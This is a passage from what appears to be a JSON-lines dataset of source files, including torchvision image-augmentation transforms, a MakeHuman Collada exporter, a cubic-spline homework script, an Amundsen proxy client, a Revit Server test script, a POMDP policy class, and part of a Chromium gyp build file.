\"Argument fillcolor is deprecated and will be removed since v0.10.0. Please, use fill instead\"\n )\n fill = fillcolor\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2, ))\n\n if translate is not None:\n _check_sequence_input(translate, \"translate\", req_sizes=(2, ))\n for t in translate:\n if not (0.0 <= t <= 1.0):\n raise ValueError(\"translation values should be between 0 and 1\")\n self.translate = translate\n\n if scale is not None:\n _check_sequence_input(scale, \"scale\", req_sizes=(2, ))\n for s in scale:\n if s <= 0:\n raise ValueError(\"scale values should be positive\")\n self.scale = scale\n\n if shear is not None:\n self.shear = _setup_angle(shear, name=\"shear\", req_sizes=(2, 4))\n else:\n self.shear = shear\n\n self.resample = self.interpolation = interpolation\n self.fillcolor = self.fill = fill\n\n @staticmethod\n def get_params(\n degrees: List[float],\n translate: Optional[List[float]],\n scale_ranges: Optional[List[float]],\n shears: Optional[List[float]],\n img_size: List[int]\n ) -> Tuple[float, Tuple[int, int], float, Tuple[float, float]]:\n \"\"\"Get parameters for affine transformation\n\n Returns:\n params to be passed to the affine transformation\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n if translate is not None:\n max_dx = float(translate[0] * img_size[0])\n max_dy = float(translate[1] * img_size[1])\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translations = (tx, ty)\n else:\n translations = (0, 0)\n\n if scale_ranges is not None:\n scale = float(torch.empty(1).uniform_(scale_ranges[0], scale_ranges[1]).item())\n else:\n scale = 1.0\n\n shear_x = shear_y = 0.0\n if shears is not None:\n shear_x = float(torch.empty(1).uniform_(shears[0], shears[1]).item())\n if len(shears) == 4:\n shear_y = float(torch.empty(1).uniform_(shears[2], shears[3]).item())\n\n shear = (shear_x, shear_y)\n\n return angle, translations, scale, shear\n\n def forward(self, img):\n \"\"\"\n img (PIL Image or Tensor): Image to be transformed.\n\n Returns:\n PIL Image or Tensor: Affine transformed image.\n \"\"\"\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n\n img_size = F._get_image_size(img)\n\n ret = self.get_params(self.degrees, self.translate, self.scale, self.shear, img_size)\n\n return F.affine(img, *ret, interpolation=self.interpolation, fill=fill)\n\n def __repr__(self):\n s = '{name}(degrees={degrees}'\n if self.translate is not None:\n s += ', translate={translate}'\n if self.scale is not None:\n s += ', scale={scale}'\n if self.shear is not None:\n s += ', shear={shear}'\n if self.interpolation != InterpolationMode.NEAREST:\n s += ', interpolation={interpolation}'\n if self.fill != 0:\n s += ', fill={fill}'\n s += ')'\n d = dict(self.__dict__)\n d['interpolation'] = self.interpolation.value\n return s.format(name=self.__class__.__name__, **d)\n\n\nclass Grayscale(torch.nn.Module):\n \"\"\"Convert image to grayscale.\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n num_output_channels (int): (1 or 3) number of channels desired for output image\n\n Returns:\n PIL Image: Grayscale version of the input.\n - If ``num_output_channels == 1`` : returned image is single channel\n - If ``num_output_channels == 3`` : returned image is 3 channel with r == g == b\n\n \"\"\"\n\n def __init__(self, num_output_channels=1):\n super().__init__()\n self.num_output_channels = num_output_channels\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Grayscaled image.\n \"\"\"\n return F.rgb_to_grayscale(img, num_output_channels=self.num_output_channels)\n\n def __repr__(self):\n return self.__class__.__name__ + '(num_output_channels={0})'.format(self.num_output_channels)\n\n\nclass RandomGrayscale(torch.nn.Module):\n \"\"\"Randomly convert image to grayscale with a probability of p (default 0.1).\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n p (float): probability that image should be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Grayscale version of the input image with probability p and unchanged\n with probability (1-p).\n - If input image is 1 channel: grayscale version is 1 channel\n - If input image is 3 channel: grayscale version is 3 channel with r == g == b\n\n \"\"\"\n\n def __init__(self, p=0.1):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Randomly grayscaled image.\n \"\"\"\n num_output_channels = F._get_image_num_channels(img)\n if torch.rand(1) < self.p:\n return F.rgb_to_grayscale(img, num_output_channels=num_output_channels)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={0})'.format(self.p)\n\n\nclass RandomErasing(torch.nn.Module):\n \"\"\" Randomly selects a rectangle region in an torch Tensor image and erases its pixels.\n This transform does not support PIL Image.\n 'Random Erasing Data Augmentation' by Zhong et al. See https://arxiv.org/abs/1708.04896\n\n Args:\n p: probability that the random erasing operation will be performed.\n scale: range of proportion of erased area against input image.\n ratio: range of aspect ratio of erased area.\n value: erasing value. Default is 0. If a single int, it is used to\n erase all pixels. If a tuple of length 3, it is used to erase\n R, G, B channels respectively.\n If a str of 'random', erasing each pixel with random values.\n inplace: boolean to make this transform inplace. Default set to False.\n\n Returns:\n Erased Image.\n\n Example:\n >>> transform = transforms.Compose([\n >>> transforms.RandomHorizontalFlip(),\n >>> transforms.ToTensor(),\n >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n >>> transforms.RandomErasing(),\n >>> ])\n \"\"\"\n\n def __init__(self, p=0.5, scale=(0.02, 0.33), ratio=(0.3, 3.3), value=0, inplace=False):\n super().__init__()\n if not isinstance(value, (numbers.Number, str, tuple, list)):\n raise TypeError(\"Argument value should be either a number or str or a sequence\")\n if isinstance(value, str) and value != \"random\":\n raise ValueError(\"If value is str, it should be 'random'\")\n if not isinstance(scale, (tuple, list)):\n raise TypeError(\"Scale should be a sequence\")\n if not isinstance(ratio, (tuple, list)):\n raise TypeError(\"Ratio should be a sequence\")\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n if scale[0] < 0 or scale[1] > 1:\n raise ValueError(\"Scale should be between 0 and 1\")\n if p < 0 or p > 1:\n raise ValueError(\"Random erasing probability should be between 0 and 1\")\n\n self.p = p\n self.scale = scale\n self.ratio = ratio\n self.value = value\n self.inplace = inplace\n\n @staticmethod\n def get_params(\n img: Tensor, scale: Tuple[float, float], ratio: Tuple[float, float], value: Optional[List[float]] = None\n ) -> Tuple[int, int, int, int, Tensor]:\n \"\"\"Get parameters for ``erase`` for a random erasing.\n\n Args:\n img (Tensor): Tensor image to be erased.\n scale (sequence): range of proportion of erased area against input image.\n ratio (sequence): range of aspect ratio of erased area.\n value (list, optional): erasing value. If None, it is interpreted as \"random\"\n (erasing each pixel with random values). If ``len(value)`` is 1, it is interpreted as a number,\n i.e. ``value[0]``.\n\n Returns:\n tuple: params (i, j, h, w, v) to be passed to ``erase`` for random erasing.\n \"\"\"\n img_c, img_h, img_w = img.shape[-3], img.shape[-2], img.shape[-1]\n area = img_h * img_w\n\n for _ in range(10):\n erase_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.empty(1).uniform_(ratio[0], ratio[1]).item()\n\n h = int(round(math.sqrt(erase_area * aspect_ratio)))\n w = int(round(math.sqrt(erase_area / aspect_ratio)))\n if not (h < img_h and w < img_w):\n continue\n\n if value is None:\n v = torch.empty([img_c, h, w], dtype=torch.float32).normal_()\n else:\n v = torch.tensor(value)[:, None, None]\n\n i = torch.randint(0, img_h - h + 1, size=(1, )).item()\n j = torch.randint(0, img_w - w + 1, size=(1, )).item()\n return i, j, h, w, v\n\n # Return original image\n return 0, 0, img_h, img_w, img\n\n def forward(self, img):\n \"\"\"\n Args:\n img (Tensor): Tensor image to be erased.\n\n Returns:\n img (Tensor): Erased Tensor image.\n \"\"\"\n if torch.rand(1) < self.p:\n\n # cast self.value to script acceptable type\n if isinstance(self.value, (int, float)):\n value = [self.value, ]\n elif isinstance(self.value, str):\n value = None\n elif isinstance(self.value, tuple):\n value = list(self.value)\n else:\n value = self.value\n\n if value is not None and not (len(value) in (1, img.shape[-3])):\n raise ValueError(\n \"If value is a sequence, it should have either a single value or \"\n \"{} (number of input channels)\".format(img.shape[-3])\n )\n\n x, y, h, w, v = self.get_params(img, scale=self.scale, ratio=self.ratio, value=value)\n return F.erase(img, x, y, h, w, v, self.inplace)\n return img\n\n\nclass GaussianBlur(torch.nn.Module):\n \"\"\"Blurs image with randomly chosen Gaussian blur.\n If the image is torch Tensor, it is expected\n to have [..., C, H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n kernel_size (int or sequence): Size of the Gaussian kernel.\n sigma (float or tuple of float (min, max)): Standard deviation to be used for\n creating kernel to perform blurring. If float, sigma is fixed. If it is tuple\n of float (min, max), sigma is chosen uniformly at random to lie in the\n given range.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred version of the input image.\n\n \"\"\"\n\n def __init__(self, kernel_size, sigma=(0.1, 2.0)):\n super().__init__()\n self.kernel_size = _setup_size(kernel_size, \"Kernel size should be a tuple/list of two integers\")\n for ks in self.kernel_size:\n if ks <= 0 or ks % 2 == 0:\n raise ValueError(\"Kernel size value should be an odd and positive number.\")\n\n if isinstance(sigma, numbers.Number):\n if sigma <= 0:\n raise ValueError(\"If sigma is a single number, it must be positive.\")\n sigma = (sigma, sigma)\n elif isinstance(sigma, Sequence) and len(sigma) == 2:\n if not 0. < sigma[0] <= sigma[1]:\n raise ValueError(\"sigma values should be positive and of the form (min, max).\")\n else:\n raise ValueError(\"sigma should be a single number or a list/tuple with length 2.\")\n\n self.sigma = sigma\n\n @staticmethod\n def get_params(sigma_min: float, sigma_max: float) -> float:\n \"\"\"Choose sigma for random gaussian blurring.\n\n Args:\n sigma_min (float): Minimum standard deviation that can be chosen for blurring kernel.\n sigma_max (float): Maximum standard deviation that can be chosen for blurring kernel.\n\n Returns:\n float: Standard deviation to be passed to calculate kernel for gaussian blurring.\n \"\"\"\n return torch.empty(1).uniform_(sigma_min, sigma_max).item()\n\n def forward(self, img: Tensor) -> Tensor:\n \"\"\"\n Args:\n img (PIL Image or Tensor): image to be blurred.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred image\n \"\"\"\n sigma = self.get_params(self.sigma[0], self.sigma[1])\n return F.gaussian_blur(img, self.kernel_size, [sigma, sigma])\n\n def __repr__(self):\n s = '(kernel_size={}, '.format(self.kernel_size)\n s += 'sigma={})'.format(self.sigma)\n return self.__class__.__name__ + s\n\n\ndef _setup_size(size, error_msg):\n if isinstance(size, numbers.Number):\n return int(size), int(size)\n\n if isinstance(size, Sequence) and len(size) == 1:\n return size[0], size[0]\n\n if len(size) != 2:\n raise ValueError(error_msg)\n\n return size\n\n\ndef _check_sequence_input(x, name, req_sizes):\n msg = req_sizes[0] if len(req_sizes) < 2 else \" or \".join([str(s) for s in req_sizes])\n if not isinstance(x, Sequence):\n raise TypeError(\"{} should be a sequence of length {}.\".format(name, msg))\n if len(x) not in req_sizes:\n raise ValueError(\"{} should be sequence of length {}.\".format(name, msg))\n\n\ndef _setup_angle(x, name, req_sizes=(2, )):\n if isinstance(x, numbers.Number):\n if x < 0:\n raise ValueError(\"If {} is a single number, it must be positive.\".format(name))\n x = [-x, x]\n else:\n _check_sequence_input(x, name, req_sizes)\n\n return [float(d) for d in x]\n\n\nclass RandomInvert(torch.nn.Module):\n \"\"\"Inverts the colors of the given image randomly with a given probability.\n If img is a Tensor, it is expected to be in [..., 1 or 3, H, W] format,\n where ... means it can have an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be inverted.\n\n Returns:\n PIL Image or Tensor: Randomly color inverted image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.invert(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomPosterize(torch.nn.Module):\n \"\"\"Posterize the image randomly with a given probability by reducing the\n number of bits for each color channel. If the image is torch Tensor, it should be of type torch.uint8,\n and it is expected to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n bits (int): number of bits to keep for each channel (0-8)\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, bits, p=0.5):\n super().__init__()\n self.bits = bits\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be posterized.\n\n Returns:\n PIL Image or Tensor: Randomly posterized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.posterize(img, self.bits)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(bits={},p={})'.format(self.bits, self.p)\n\n\nclass RandomSolarize(torch.nn.Module):\n \"\"\"Solarize the image randomly with a given probability by inverting all pixel\n values above a threshold. If img is a Tensor, it is expected to be in [..., 1 or 3, H, W] format,\n where ... means it can have an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n threshold (float): all pixels equal or above this value are inverted.\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, threshold, p=0.5):\n super().__init__()\n self.threshold = threshold\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be solarized.\n\n Returns:\n PIL Image or Tensor: Randomly solarized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.solarize(img, self.threshold)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(threshold={},p={})'.format(self.threshold, self.p)\n\n\nclass RandomAdjustSharpness(torch.nn.Module):\n \"\"\"Adjust the sharpness of the image randomly with a given probability. If the image is torch Tensor,\n it is expected to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n sharpness_factor (float): How much to adjust the sharpness. Can be\n any non negative number. 0 gives a blurred image, 1 gives the\n original image while 2 increases the sharpness by a factor of 2.\n p (float): probability of the image being color inverted. Default value is 0.5\n \"\"\"\n\n def __init__(self, sharpness_factor, p=0.5):\n super().__init__()\n self.sharpness_factor = sharpness_factor\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be sharpened.\n\n Returns:\n PIL Image or Tensor: Randomly sharpened image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.adjust_sharpness(img, self.sharpness_factor)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(sharpness_factor={},p={})'.format(self.sharpness_factor, self.p)\n\n\nclass RandomAutocontrast(torch.nn.Module):\n \"\"\"Autocontrast the pixels of the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being autocontrasted. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be autocontrasted.\n\n Returns:\n PIL Image or Tensor: Randomly autocontrasted image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.autocontrast(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n\n\nclass RandomEqualize(torch.nn.Module):\n \"\"\"Equalize the histogram of the given image randomly with a given probability.\n If the image is torch Tensor, it is expected\n to have [..., 1 or 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"P\", \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being equalized. Default value is 0.5\n \"\"\"\n\n def __init__(self, p=0.5):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be equalized.\n\n Returns:\n PIL Image or Tensor: Randomly equalized image.\n \"\"\"\n if torch.rand(1).item() < self.p:\n return F.equalize(img)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={})'.format(self.p)\n"} {"ext": "py", "sha": "1a308f7e9bd682eb831b7022a8afafc9c2739711", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n**Project Name:** MakeHuman\n\n**Product Home Page:** http://www.makehumancommunity.org/\n\n**Github Code Home Page:** https://github.com/makehumancommunity/\n\n**Authors:** Thomas Larsson, Jonas Hauquier\n\n**Copyright(c):** MakeHuman Team 2001-2019\n\n**Licensing:** AGPL3\n\n This file is part of MakeHuman (www.makehumancommunity.org).\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU Affero General Public License as\n published by the Free Software Foundation, either version 3 of the\n License, or (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU Affero General Public License for more details.\n\n You should have received a copy of the GNU Affero General Public License\n along with this program. If not, see .\n\n\nAbstract\n--------\n\nTODO\n\"\"\"\n\nfrom export import Exporter, ExportConfig\n\n\nclass DaeConfig(ExportConfig):\n def __init__(self):\n ExportConfig.__init__(self)\n\n self.useRelPaths = True\n self.useNormals = True\n\n self.yUpFaceZ = True\n self.yUpFaceX = False\n self.zUpFaceNegY = False\n self.zUpFaceX = False\n\n self.localY = True\n self.localX = False\n self.localG = False\n\n self.facePoseUnits = False\n self.hiddenGeom = False\n\n # TODO preferably these are used (perhaps as enum) instead of the bools above\n # TODO move these to export Config super class\n @property\n def meshOrientation(self):\n if self.yUpFaceZ:\n return 'yUpFaceZ'\n if self.yUpFaceX:\n return 'yUpFaceX'\n if self.zUpFaceNegY:\n return 'zUpFaceNegY'\n if self.zUpFaceX:\n return 'zUpFaceX'\n return 'yUpFaceZ'\n\n @property\n def localBoneAxis(self):\n if self.localY:\n return 'y'\n if self.localX:\n return 'x'\n if self.localG:\n return 'g'\n return 'y'\n\n @property\n def upAxis(self):\n if self.meshOrientation.startswith('yUp'):\n return 1\n elif self.meshOrientation.startswith('zUp'):\n return 2\n\n '''\n @property\n def offsetVect(self):\n result = [0.0, 0.0, 0.0]\n result[self.upAxis] = self.offset\n return result\n '''\n\nclass ExporterCollada(Exporter):\n def __init__(self):\n Exporter.__init__(self)\n self.name = \"Collada (dae)\"\n self.filter = \"Collada (*.dae)\"\n self.fileExtension = \"dae\"\n self.orderPriority = 95.0\n\n def build(self, options, taskview):\n import gui\n Exporter.build(self, options, taskview)\n\n self.hiddenGeom = options.addWidget(gui.CheckBox(\"Helper geometry\", False))\n self.facePoseUnits = options.addWidget(gui.CheckBox(\"Facial pose-units\", False))\n\n orients = []\n box = options.addWidget(gui.GroupBox(\"Orientation\"))\n self.yUpFaceZ = box.addWidget(gui.RadioButton(orients, \"Y up, face Z\", True))\n self.yUpFaceX = box.addWidget(gui.RadioButton(orients, \"Y up, face X\", False))\n self.zUpFaceNegY = box.addWidget(gui.RadioButton(orients, \"Z up, face -Y\", False))\n self.zUpFaceX = box.addWidget(gui.RadioButton(orients, \"Z up, face X\", False))\n\n csyses = []\n box = options.addWidget(gui.GroupBox(\"Bone orientation\"))\n self.localY = box.addWidget(gui.RadioButton(csyses, \"Along local Y\", True))\n self.localX = box.addWidget(gui.RadioButton(csyses, \"Along local X\", False))\n self.localG = box.addWidget(gui.RadioButton(csyses, \"Local = Global\", False))\n\n def export(self, human, filename):\n from .mh2collada import exportCollada\n cfg = self.getConfig()\n cfg.setHuman(human)\n exportCollada(filename(\"dae\"), cfg)\n\n def getConfig(self):\n cfg = DaeConfig()\n cfg.feetOnGround = self.feetOnGround.selected\n cfg.scale,cfg.unit = self.taskview.getScale()\n\n cfg.yUpFaceZ = self.yUpFaceZ.selected\n cfg.yUpFaceX = self.yUpFaceX.selected\n cfg.zUpFaceNegY = self.zUpFaceNegY.selected\n cfg.zUpFaceX = self.zUpFaceX.selected\n\n cfg.localY = self.localY.selected\n cfg.localX = self.localX.selected\n cfg.localG = self.localG.selected\n\n cfg.facePoseUnits = self.facePoseUnits.selected\n cfg.hiddenGeom = self.hiddenGeom.selected\n\n return cfg\n\n\ndef load(app):\n app.addExporter(ExporterCollada())\n\ndef unload(app):\n pass\n"} {"ext": "py", "sha": "1a308fc844743316e91889144701d06fd1f68333", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/04 14:23\n# @Author : Iydon\n# @File : course3.5.py\n\nimport numpy as np\nfrom Poly import *\nimport matplotlib.pyplot as plt\n\ndef natural_cubic_spline(xs:list, fxs:list, display:bool=False):\n \"\"\"\n Cubic spline interpolation.\n \"\"\"\n n = len(xs)\n hs = [xs[i+1]-xs[i] for i in range(n-1)]\n A = np.diag([0]+hs[1:],1) + np.diag(hs[:-1]+[0],-1)\n A += np.diag([1]+[2*(hs[i+1]+hs[i]) for i in range(n-2)]+[1])\n bs = [0]+[3/hs[i+1]*(fxs[i+2]-fxs[i+1])-3/hs[i]*(fxs[i+1]-fxs[i]) for i in range(n-2)]+[0]\n # a, b, c, d: end with 'x'.\n cx = [i[0] for i in (np.linalg.inv(A) * np.matrix(bs).transpose()).tolist()]\n bx = [1/hs[i]*(fxs[i+1]-fxs[i])-hs[i]/3*(2*cx[i]+cx[i+1]) for i in range(n-1)]\n dx = [1/3/hs[i]*(cx[i+1]-cx[i]) for i in range(n-1)]\n # S_i(x)\n Ss = [fxs[i]+bx[i]*Poly([1,-xs[i]])+cx[i]*Poly([1,-xs[i]])**2+dx[i]*Poly([1,-xs[i]])**3 for i in range(n-1)]\n if display: print(fxs, bx, cx, dx, sep=\"\\n\\n\\n\")\n return Ss\n\ndef clamped_cubic_spline(xs:list, fxs:list, boundray:list=[0,0]):\n \"\"\"\n Cubic spline interpolation.\n \"\"\"\n n = len(xs)\n hs = [xs[i+1]-xs[i] for i in range(n-1)]\n A = np.diag(hs,1) + np.diag(hs,-1)\n A += np.diag([2*hs[0]]+[2*(hs[i+1]+hs[i]) for i in range(n-2)]+[2*hs[-1]])\n head = [3/hs[0]*(fxs[1]-fxs[0]) - 3*boundray[0]]\n tail = [3*boundray[-1] - 3/hs[-1]*(fxs[-1]-fxs[-2])]\n bs = head+[3/hs[i+1]*(fxs[i+2]-fxs[i+1])-3/hs[i]*(fxs[i+1]-fxs[i]) for i in range(n-2)]+tail\n # a, b, c, d: end with 'x'.\n cx = [i[0] for i in (np.linalg.inv(A) * np.matrix(bs).transpose()).tolist()]\n bx = [1/hs[i]*(fxs[i+1]-fxs[i])-hs[i]/3*(2*cx[i]+cx[i+1]) for i in range(n-1)]\n dx = [1/3/hs[i]*(cx[i+1]-cx[i]) for i in range(n-1)]\n # S_i(x)\n Ss = [fxs[i]+bx[i]*Poly([1,-xs[i]])+cx[i]*Poly([1,-xs[i]])**2+dx[i]*Poly([1,-xs[i]])**3 for i in range(n-1)]\n return Ss\n\ndef cubic_spline_lambdify(S:str, xs:list):\n \"\"\"\n Lambdify the cubic spline function.\n \"\"\"\n f = [\"%s[%d].lambdify()(x)*(%s<=x<%s)\"%(S, i, xs[i], xs[i+1]) for i in range(len(xs)-1)]\n return eval(\"lambda x: %s\"%\"+\".join(f))\n\nxs = [0.9,1.3,1.9,2.1,2.6,3.0,3.9,4.4,4.7,5.0,6.0,7.0,8.0,9.2,10.5,11.3,11.6,12.0,12.6,13.0,13.3]\nfxs = [1.3,1.5,1.85,2.1,2.6,2.7,2.4,2.15,2.05,2.1,2.25,2.3,2.25,1.95,1.4,0.9,0.7,0.6,0.5,0.4,0.25]\n\nS = natural_cubic_spline(xs, fxs)\n\nf = cubic_spline_lambdify(\"S\", xs)\nplt.plot(xs, fxs, marker=\"*\", color=\"orange\")\n\nx = np.linspace(0.9, 13.29, 100)\ny = [f(x) for x in x]\nplt.plot(x, y, color=\"blue\")\nplt.axis(\"equal\")\nplt.grid()\nplt.show()\n"} {"ext": "py", "sha": "1a308fd9e1ebc079500cbd82442e5e805649c7a7", "content": "# Copyright Contributors to the Amundsen project.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom threading import Lock\n\nfrom flask import current_app\nfrom werkzeug.utils import import_string\n\nfrom search_service import config\nfrom search_service.proxy.base import BaseProxy\n\n_proxy_client = None\n_proxy_client_lock = Lock()\n\nDEFAULT_PAGE_SIZE = 10\n\n\ndef get_proxy_client() -> BaseProxy:\n \"\"\"\n Provides singleton proxy client based on the config\n :return: Proxy instance of any subclass of BaseProxy\n \"\"\"\n global _proxy_client\n\n if _proxy_client:\n return _proxy_client\n\n with _proxy_client_lock:\n if _proxy_client:\n return _proxy_client\n else:\n obj = current_app.config[config.PROXY_CLIENT_KEY]\n\n # Gather all the configuration to create a Proxy Client\n host = current_app.config[config.PROXY_ENDPOINT]\n user = current_app.config[config.PROXY_USER]\n password = current_app.config[config.PROXY_PASSWORD]\n client = import_string(current_app.config[config.PROXY_CLIENT])\n\n # number of results per search page\n page_size = current_app.config.get(config.SEARCH_PAGE_SIZE_KEY, DEFAULT_PAGE_SIZE)\n\n _proxy_client = client(host=host, user=user, password=password, client=obj, page_size=page_size)\n\n return _proxy_client\n"} {"ext": "py", "sha": "1a3090b1f1b7c8ec957944ac445ccef2d60698f9", "content": "import sys\nimport os.path as op\n\nrpws_folder = op.dirname(op.dirname(__file__))\nsys.path.append(rpws_folder)\nprint('sys.path + {}'.format(rpws_folder))\n\nfrom rpws import RevitServer\n\nimport testconfig as config\n\n\nrs = RevitServer(config.test_server_name, config.test_server_version)\n\n\nfor parent, folders, files, models in rs.walk(config.test_folder):\n print(parent)\n for fd in folders:\n print('\\t@d {}'.format(fd.path))\n for f in files:\n print('\\t@f {}'.format(f.path))\n for m in models:\n print('\\t@m {}'.format(m.path))\n"} {"ext": "py", "sha": "1a30918f59610302054f0f57c278941b01e37f05", "content": "import random\nfrom collections import namedtuple\nfrom abc import abstractmethod, ABC\nfrom typing import TypeVar\n\nfrom msdm.core.problemclasses.pomdp.pomdp import \\\n State, Action, Observation, PartiallyObservableMDP\nfrom msdm.core.problemclasses.pomdp.tabularpomdp import TabularPOMDP, Belief\nfrom msdm.core.distributions import Distribution, DictDistribution\nfrom msdm.core.algorithmclasses import Result\n\nAgentState = TypeVar('AgentState')\nStep = namedtuple(\"Step\", \"state agentstate action nextstate reward observation nextagentstate\")\n\nclass POMDPPolicy(ABC):\n @abstractmethod\n def initial_agentstate(self) -> AgentState:\n pass\n\n @abstractmethod\n def action_dist(self, ag : AgentState) -> Distribution[Action]:\n pass\n\n @abstractmethod\n def next_agentstate(self, ag : AgentState, a : Action, o : Observation) -> AgentState:\n pass\n\n def run_on(self,\n pomdp: PartiallyObservableMDP,\n initial_state=None,\n initial_agentstate=None,\n max_steps=int(2 ** 30),\n rng=random):\n if initial_state is None:\n initial_state = pomdp.initial_state_dist().sample()\n if initial_agentstate is None:\n initial_agentstate = self.initial_agentstate()\n\n traj = []\n s = initial_state\n ag = initial_agentstate\n for t in range(max_steps):\n if pomdp.is_terminal(s):\n break\n a = self.action_dist(ag).sample(rng=rng)\n ns = pomdp.next_state_dist(s, a).sample(rng=rng)\n r = pomdp.reward(s, a, ns)\n o = pomdp.observation_dist(a, ns).sample(rng=rng)\n nag = self.next_agentstate(ag, a, o)\n traj.append(Step(s, ag, a, ns, r, o, nag))\n s = ns\n ag = nag\n traj.append(Step(s, ag, None, None, None, None, None))\n if traj:\n states, agentstates, actions, _, rewards, _, _ = zip(*traj)\n else:\n states = ()\n actions = ()\n rewards = ()\n agentstates = ()\n return traj\n\nclass ValueBasedTabularPOMDPPolicy(POMDPPolicy):\n \"\"\"\n POMDP policy that selects actions based on a\n representation of action values at a belief state.\n \"\"\"\n def __init__(self, pomdp : TabularPOMDP):\n self.pomdp = pomdp\n\n @abstractmethod\n def action_value(self, b : Belief, a : Action):\n pass\n\n def initial_agentstate(self):\n return Belief(tuple(self.pomdp.state_list), tuple(self.pomdp.initial_state_vec))\n\n def action_dist(self, ag : Belief):\n av = {a: self.action_value(ag, a) for a in self.pomdp.action_list}\n maxv = max(av.values())\n return DictDistribution.uniform([a for a, v in av.items() if v == maxv])\n\n def next_agentstate(self, ag, a, o):\n s_dist = DictDistribution(zip(*ag))\n ns_dist = self.pomdp.state_estimator(s_dist, a, o)\n ss = tuple(self.pomdp.state_list)\n return Belief(ss, tuple([ns_dist.prob(ns) for ns in ss]))\n"} {"ext": "gyp", "sha": "1a30919ff2ff549be6e1bebd0c68b2a0f2806d5f", "content": "# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n{\n 'target_defaults': {\n 'variables': {\n 'chromium_code': 1,\n },\n 'include_dirs': [\n '<(DEPTH)',\n ],\n },\n 'targets': [\n {\n 'target_name': 'cloud_print_service_lib',\n 'type': 'static_library',\n 'dependencies': [\n '<(DEPTH)/base/base.gyp:base',\n '<(DEPTH)/build/temp_gyp/googleurl.gyp:googleurl',\n '<(DEPTH)/net/net.gyp:net',\n '<(DEPTH)/printing/printing.gyp:printing',\n ],\n 'sources': [\n 'service_state.cc',\n 'service_state.h',\n 'service_switches.cc',\n 'service_switches.h',\n 'win/chrome_launcher.cc',\n 'win/chrome_launcher.h',\n 'win/local_security_policy.cc',\n 'win/local_security_policy.h',\n ],\n 'conditions': 